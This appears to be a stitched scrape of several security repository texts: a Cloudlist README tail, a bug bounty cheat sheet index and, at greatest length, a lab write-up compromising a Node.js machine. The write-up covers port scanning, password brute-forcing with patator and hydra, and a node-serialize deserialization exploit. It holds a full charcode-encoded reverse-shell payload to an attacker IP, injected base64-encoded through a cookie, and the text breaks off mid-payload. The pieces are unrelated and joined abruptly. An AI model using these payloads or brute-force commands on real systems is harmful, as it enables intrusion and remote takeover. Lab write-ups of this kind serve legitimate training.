<path-to-key-file>.pem # consul_http_token is the consul authentication token # consul_http_token: <consul-token> # consul_http_auth is the consul http auth value # consul_http_auth: <consul-http-auth-value>` ``` # Contribution Please check [PROVIDERS.md](https://github.com/projectdiscovery/cloudlist/blob/main/PROVIDERS.md) and [DESIGN.md](https://github.com/projectdiscovery/cloudlist/blob/main/DESIGN.md) to include support for new cloud providers in Cloudlist. - Fork this project - Create your feature branch (`git checkout -b new-provider`) - Commit your changes (`git commit -am 'Added new cloud provider'`) - Push to the branch (`git push origin new-provider`) - Create new Pull Request # Cloudlist as a library It's possible to use the library directly in your go programs. The following code snippets outline how to list assets from all or given cloud provider. ```go package main import ( "context" "log" "github.com/projectdiscovery/cloudlist/pkg/inventory" "github.com/projectdiscovery/cloudlist/pkg/schema" ) func main() { inventory, err := inventory.New(schema.Options{ schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"}, }) if err != nil { log.Fatalf("%s\n", err) } for _, provider := range inventory.Providers { resources, err := provider.Resources(context.Background()) if err != nil { log.Fatalf("%s\n", err) } for _, resource := range resources.Items { _ = resource // Do something with the resource } } } ``` ## Acknowledgments Thank you for inspiration * [Smogcloud](https://github.com/BishopFox/smogcloud) * [Cloudmapper](https://github.com/duo-labs/cloudmapper) ## License cloudlist is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team and licensed under [MIT](https://github.com/projectdiscovery/cloudlist/blob/main/LICENSE.md)
# Jeeves: stack variable overwrite **[SEE VIDEO WALKTHROUGH HERE](https://youtu.be/SgoCGETbnZg)**
# Bug Bounty Cheat Sheet - [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) - [Books](cheatsheets/books.md) - [Special Tools](cheatsheets/special-tools.md) - [Recon](cheatsheets/recon.md) - [XSS](cheatsheets/xss.md) - [SQLI](cheatsheets/sqli.md) - [SSRF](cheatsheets/ssrf.md) - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) - [XXE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) - [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) - [XSLT Injection](cheatsheets/xslt.md) # Contributing We welcome contributions from the public. ### Using the issue tracker 💡 The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues) ### Issues and labels 🏷 Our bug tracker utilizes several labels to help organize and identify issues. ### Guidelines for bug reports 🐛 Use the GitHub issue search — check if the issue has already been reported. # Style Guide We like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.) - Cheat sheet titles should start with `##`. - Subheadings should be made bold. (`**Subheading**`) - Add newlines after subheadings and code blocks. - Code blocks should use three backticks. (```) - Make sure to use syntax highlighting whenever possible. # Contributors - [EdOverflow](https://github.com/EdOverflow) - [GerbenJavado](https://github.com/GerbenJavado) - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae)
# Inteface ## Table of Contents * [Summary](#summary) * [Enumerate](#enumerate) * [Ports](#ports) * [Services](#services) * [SSH](#ssh) * [HTTP](#http) * [OS](#os) * [Nmap OS Discovery Scan](#nmap-os-discovery-scan) * [Nmap OS Aggresive Scan](#nmap-os-aggresive-scan) * [Nmap OS Scripts Scan](#nmap-os-scripts-scan) * [Exploit](#exploit) * [Password Guessing](#password-guessing) * [Patator](#patator) * [Hydra](#hydra) * [CVE-2017-5941](#cve-2017-5941) * [EDB-ID-45265](#edb-id-45265) * [piyush-saurabh POC](#piyush-saurabh-poc) * [EDB-ID-49552](#edb-id-49552) * [Custom POC](#custom-poc) * [Solution](#solution) * [Explore](#explore) * [Escalate](#escalate) * [Lessons Learned](#lessons-learned) ## Summary * Hostname: inteface * Description: This machine is easy and right up your node. * IP Address: 192.168.83.106 * MAC Address: (ref:) * Domain: WORKGROUP * TCP Ports and Services * 22 * OpenSSH 7.9 * 80 * Node.js Express framework * OS * Distro: Debian (ref: Nmap) * Kernel: Linux (ref: Nmap) * Architecture: (ref:) * Users and passwords (ref:) * root * dev-acct:password (ref: patator) * Vulnerabilities and Exploits * CVE-2017-5941 (ref: searchsploit) * EDB-ID-45265 * piyush-saurabh POC * Flag * decbb74608cf8ea31a4664368686fe74 * Hints * n/a # Enumerate ## Setup ```bash TARGET=192.168.83.106 NAME=interface new-ctf $NAME cd $NAME ``` ## Ports ```bash sudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial sudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete sudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:13 EDT Nmap scan report for 192.168.83.106 Host is up (0.074s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Node.js Express framework Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds ``` ## Services ### SSH ```bash hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.83.106 # output NSTR ``` ### HTTP ```bash dirb http://$TARGET -r -z10 -o scans/$NAME-dirb-common dirb http://$TARGET -w /usr/share/wordlists/dirb/big.txt -r -z10 -o scans/$NAME-dirb-big # output ---- Scanning URL: http://192.168.83.106/ ---- + http://192.168.83.106/favicon.ico (CODE:200|SIZE:948) + http://192.168.83.106/index.html (CODE:200|SIZE:703) ``` ```bash dirsearch -u 192.168.83.106 -e php -o /home/victor/oscp/pg/labs/interface/scans/interface-dirsearch-php --format=simple # output NSTR ``` ```bash nikto -h $TARGET -p $PORT -T 2 -Format txt -o scans/$NAME-nikto-misconfig # output - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.83.106 + Target Hostname: 192.168.83.106 + Target Port: 80 + Start Time: 2021-07-04 17:36:52 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + Retrieved x-powered-by header: Express + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + 1351 requests: 0 error(s) and 4 item(s) reported on remote host + End Time: 2021-07-04 17:38:50 (GMT-4) (118 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ## OS ### Nmap OS Discovery Scan ```bash sudo nmap $TARGET -O -oN scans/$NAME-nmap-os # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:27 EDT Nmap scan report for 192.168.83.106 Host is up (0.078s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=7/4%OT=22%CT=1%CU=38193%PV=Y%DS=2%DC=I%G=Y%TM=60E227BB OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1=M5 OS:06ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O OS:6=M506ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D OS:F=Y%T=40%W=FAF0%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R OS:UD=G)IE(R=Y%DFI=N%T=40%CD=S) ``` ### Nmap Aggressive Scan ```bash sudo nmap 192.168.83.106 -A -oN scans/interface-nmap-aggressive # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:19 EDT Nmap scan report for 192.168.83.106 Host is up (0.080s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 08:50:f6:e6:aa:44:d6:c4:f1:ca:3c:d1:d9:18:43:4d (RSA) | 256 ed:c6:e6:95:88:99:58:31:14:20:38:83:01:e2:e7:15 (ECDSA) |_ 256 ba:65:96:08:a2:e2:f5:1f:af:88:6e:55:c7:9c:5f:b1 (ED25519) 80/tcp open http Node.js Express framework |_http-title: App No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=7/4%OT=22%CT=1%CU=33200%PV=Y%DS=2%DC=T%G=Y%TM=60E225FF OS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M5 OS:06ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O OS:6=M506ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D OS:F=Y%T=40%W=FAF0%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R OS:UD=G)IE(R=Y%DFI=N%T=40%CD=S) ``` ### Nmap Scripts Scan ```bash sudo nmap 192.168.83.106 -sC -oN scans/interface-nmap-scripts # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:37 EDT Nmap scan report for 192.168.83.106 Host is up (0.074s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 08:50:f6:e6:aa:44:d6:c4:f1:ca:3c:d1:d9:18:43:4d (RSA) | 256 ed:c6:e6:95:88:99:58:31:14:20:38:83:01:e2:e7:15 (ECDSA) |_ 256 ba:65:96:08:a2:e2:f5:1f:af:88:6e:55:c7:9c:5f:b1 (ED25519) 80/tcp open http |_http-title: App Nmap done: 1 IP address (1 host up) scanned in 10.30 seconds ``` # Exploit ## Password Guessing ### Patator This worked! Patator discovered a valid login (dev-acct:password). ```bash # usernames: http=192.168.132.106/api/users # python -c "names = <names>; for name in names: print name" | sort | uniq # grep admin, dev, test patator http_fuzz url=http://192.168.132.106/login method=POST body='username=FILE0&password=FILE1' 0=usernames.txt 1=/usr/share/wordlists/rockyou.txt -x ignore:fgrep=Unauthorized # output 09:39:52 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.1 at 2021-07-05 09:39 EDT 09:39:52 patator INFO - 09:39:52 patator INFO - code size:clen time | candidate | num | mesg 09:39:52 patator INFO - ----------------------------------------------------------------------------- 09:39:52 patator INFO - 200 330:2 0.153 | dev-acct:password | 4 | HTTP/1.1 200 OK ``` ### Hydra This did not work (Hydra never sent any actual web requests; observed using Wireshark). ```bash hydra -l dev-acct -P /usr/share/wordlists/rockyou.txt 192.168.132.106 http-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=Referer: http://192.168.132.106:H=Origin: http://192.168.132.106:Unauthorized" # output NSTR ``` ## CVE-2017-5941 ### EDB-ID-45265 This is not an exploit... ```bash searchsploit node.js mkdir edb-id-45265 cd edb-id-45265 searchsploit -x 45265 cat 45265.js ``` ### piyush-saurabh POC This did not work. ```bash mkdir piyush-saurabh-poc cd piyush-saurabh-poc wget https://raw.githubusercontent.com/piyush-saurabh/exploits/master/nodejsshell.py sudo nc -nvlp 80 python nodejsshell 192.168.49.83 80 echo '<javascript_code>' | base64 # use the base64 code as a cookie value ``` ### EDB-ID-49552 This did not work. ```bash mkdir edb-id-49552 cd edb-id-49552 searchsploit -m 49552 vim 49552.py # modify exploit python 49552.py ``` ### Custom POC Steps summarized. ```bash python nodejsshell.py 192.168.49.132 80 echo -n 'javascript_payload' | base64 -w0 # no new lines; wrap zero lines # append this to the Cookie header (after connect.sid) profile=<encoded_string> # connect.sid represents the authorization to do stuff (dev-acct authentication) ``` Example. ```bash python nodejsshell.py 192.168.49.132 80 # output [+] LHOST = 192.168.49.132 [+] LPORT = 80 [+] Encoding eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,56,48,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10)) echo -n 'eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))' | base64 -w0 # output ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2LDQ5LDU0LDU2LDQ2LDUyLDU3LDQ2LDQ5LDUxLDUwLDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUyLDUyLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKQ== # HTTP request # I was able to verify my connect.sid value (as dev-acct) by changing the color-theme # once I confirmed I had valid credentials, I appended my payload to the Cookie header via the "profile" parameter POST /api/settings HTTP/1.1 Host: 192.168.132.106 Content-Length: 22 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: application/json Origin: http://192.168.132.106 Referer: http://192.168.132.106/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: connect.sid=s%3AZqDOBhU5JUHa-6zADULUY_e3_b8ykxng.faM0vT9IFvXPrdv%2FDKoUuvP4HY9PMZnwQA3Silrz7v4; profile=ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2LDQ5LDU0LDU2LDQ2LDUyLDU3LDQ2LDQ5LDUxLDUwLDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUyLDUyLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0